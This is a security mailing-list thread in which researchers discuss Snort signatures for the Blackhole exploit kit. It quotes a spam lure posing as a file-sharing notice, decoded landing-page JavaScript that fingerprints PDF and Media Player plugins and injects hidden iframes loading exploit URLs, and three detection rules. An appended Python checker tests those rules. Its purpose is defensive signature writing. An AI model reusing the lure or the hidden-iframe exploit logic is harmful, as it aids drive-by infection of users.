[Emerging-Sigs] Proposed Signature for Blackhole Exploit Landing malicious applet

Nick Randolph randolphdavidn at gmail.com
Mon Oct 3 11:49:13 EDT 2011


It's hitting people from inbound spam and people are clicking the links :(
Here is a sample message; the filename, file size and the sent-by NAME are not
static. The Download link sends them off to the main.php site URL associated
with the blackhole exploit toolkit.

Sendspace File Delivery Notification:
You've got a file called Ahauge-26799.pdf, (705.9 KB) waiting to be
downloaded at sendspace.(It was sent by DENAE READ).
You can use the following link to retrieve your file:
Download Link
The file may be available for a limited time only.
Thank you,sendspace - The best free file sharing service
.----------------------------------------------------------------------
Please do not reply to this email. This auto-mailbox is not monitored and
you will not receive a response.

On Mon, Oct 3, 2011 at 10:32 AM, Chris Wakelin <c.d.wakelin at reading.ac.uk> wrote:

> Hmm, looking at one from last week we have (thanks to my yucky decoder +
> jsbeautifier.py):-
>
> > function spl5() {
> >     if (pdfver[0] > 0 && pdfver[0] < 8) {
> >         show_pdf('./content/1fdp.php?f=22')
> >     } else if ((pdfver[0] == 8) || (pdfver[0] == 9 && pdfver[1] <= 3)) {
> >         show_pdf2('./content/2fdp.php?f=22')
> >     }
> >     spl6()
> > }
>
> (I've never seen a 1fdp.php download - perhaps it's too old an exploit
> now!)
>
> > function spl6() {
> >     try {
> >         for (var i = 0, m; i < navigator.plugins.length; i++) {
> >             var name = navigator.plugins[i].name;
> >             if (name.indexOf('Media Player') != -1) {
> >                 m = document.createElement('IFRAME');
> >                 m.setAttribute('src', './content/pch2.php?c=22');
> >                 m.setAttribute('width', 0);
> >                 m.setAttribute('height', 0);
> >                 document.body.appendChild(m)
> >             }
> >         }
> >     } catch (e) {}
> >     setTimeout(spl7, 1000)
> > }
>
> I'm not sure I've ever seen a pch2.php download either (other than by
> me!), but I guess we could add detection for this?
>
> Best Wishes,
> Chris
>
> On 03/10/11 15:13, Nathan wrote:
> > On Mon, 03 Oct 2011 15:07:59 +0100 Chris Wakelin <c.d.wakelin at reading.ac.uk>
> > wrote
> >
> >> Looking at the actual exploit kit, they're including the Java and PDF
> >> exploits but not the Flash or HCP exploits (whatever HCP is?) at the moment.
> >
> > It's the Help Control Protocol, another pseudo-protocol used by Win32,
> > 'hcp://'.  There were a few vulnerabilities out for it and it looks like the
> > exploit kits are leveraging it.  From what I recall I do have one up there for
> > HCP in less than Media Player 10.0... I believe I wrote 2013077 so it may need
> > some updating if the URI has changed.
> >
> >
> > http://blogs.technet.com/b/srd/archive/2010/06/10/help-and-support-center-vulnerability-full-disclosure-posting.aspx
> >
> > emerging-current_events.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS Blackhole Exploit Pack HCP overflow Media Player lt 10"; flow:established,to_server; content:"/hcp_asx.php?f="; http_uri; pcre:"/hcp_asx\.php\?f=\d+$/U"; classtype:trojan-activity; sid:2013077; rev:1;)
> >
> > emerging-current_events.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS Blackhole Exploit Pack HCP exploit"; flow:established,to_server; content:"/pch.php?f="; http_uri; pcre:"/pch\.php\?f=\d+$/U"; classtype:bad-unknown; sid:2013548; rev:1;)
> >
> > emerging-current_events.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS Blackhole Exploit Pack HCP exploit 2"; flow:established,to_server; content:"/hcp_vbs.php?f="; http_uri; pcre:"/hcp_vbs\.php\?f=\d+&d=\d+$/U"; classtype:bad-unknown; sid:2013549; rev:1;)
> >
> > Thanks,
> > Nathan
> >
> >
>
>
> --
> --+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+-
> Christopher Wakelin,                           c.d.wakelin at reading.ac.uk
> IT Services Centre, The University of Reading,  Tel: +44 (0)118 378 2908
> Whiteknights, Reading, RG6 6AF, UK              Fax: +44 (0)118 975 3094
>  _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
> Support Emerging Threats! Subscribe to Emerging Threats Pro
> http://www.emergingthreatspro.com
> The ONLY place to get complete premium rulesets for Snort 2.4.0 through
> Current!
>
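Added example, not part of the thread above and not Emerging Threats code: a small Python checker that transcribes the content and PCRE matchers of the three HCP rules Nathan quoted (sids 2013077, 2013548, 2013549) and runs them over constructed HTTP request lines, so that a rule author can see which URIs the existing signatures fire on and which fall through. The request lines are constructed for this example; the `/content/pch2.php?c=22` form is taken from the decoded `spl6()` function in Chris's reply and is included precisely because, as the output shows, none of the three existing rules match it, which is the detection gap Chris asks about. The Snort `$` anchor is approximated with Python's `re.search` on the URI alone; real Snort matching runs against the normalized `http_uri` buffer.

```python
import re

# Rules transcribed from Nathan's reply in the thread: (sid, msg, content match, pcre).
# The content string is Snort's fast-pattern pre-filter; the PCRE is the precise check.
RULES = [
    (2013077,
     "ET CURRENT_EVENTS Blackhole Exploit Pack HCP overflow Media Player lt 10",
     "/hcp_asx.php?f=", re.compile(r"hcp_asx\.php\?f=\d+$")),
    (2013548,
     "ET CURRENT_EVENTS Blackhole Exploit Pack HCP exploit",
     "/pch.php?f=", re.compile(r"pch\.php\?f=\d+$")),
    (2013549,
     "ET CURRENT_EVENTS Blackhole Exploit Pack HCP exploit 2",
     "/hcp_vbs.php?f=", re.compile(r"hcp_vbs\.php\?f=\d+&d=\d+$")),
]

# Constructed sample request lines (not captured traffic). The pch2.php URI shape
# comes from the spl6() function decoded in the thread; the others exercise the rules.
SAMPLE_REQUESTS = [
    "GET /content/hcp_asx.php?f=22 HTTP/1.1",
    "GET /content/pch.php?f=22 HTTP/1.1",
    "GET /content/hcp_vbs.php?f=22&d=1 HTTP/1.1",
    "GET /content/pch2.php?c=22 HTTP/1.1",      # no existing rule covers this form
    "GET /content/pch.php?f=22&x=1 HTTP/1.1",   # content matches, but the $-anchored pcre does not
    "GET /index.html HTTP/1.1",
]


def match_rules(uri):
    """Return the sids of all rules whose content AND pcre match the given URI.

    Mirrors Snort semantics for these rules: the content keyword is a plain
    substring test on the URI, and the pcre with /U is applied to the same URI.
    """
    hits = []
    for sid, _msg, content, pcre in RULES:
        if content in uri and pcre.search(uri):
            hits.append(sid)
    return hits


def uri_from_request_line(line):
    """Extract the request-URI from an HTTP request line; None if malformed."""
    parts = line.split()
    if len(parts) != 3:
        return None
    return parts[1]


def scan_requests(lines):
    """Run every rule over each request line; return [(uri, [matching sids]), ...]."""
    results = []
    for line in lines:
        uri = uri_from_request_line(line)
        if uri is None:
            continue
        results.append((uri, match_rules(uri)))
    return results


if __name__ == "__main__":
    for uri, sids in scan_requests(SAMPLE_REQUESTS):
        label = ", ".join(str(s) for s in sids) if sids else "no match"
        print(f"{uri:40s} -> {label}")
```

The two unmatched lines are the ones worth a rule author's attention: the `pch2.php?c=` form differs from `pch.php?f=` in both the script name and the parameter, so neither the content pre-filter nor the PCRE of 2013548 can hit it; and a trailing extra parameter defeats the `\d+$` anchor, which is the kind of change Nathan anticipates when he says 2013077 "may need some updating if the URI has changed".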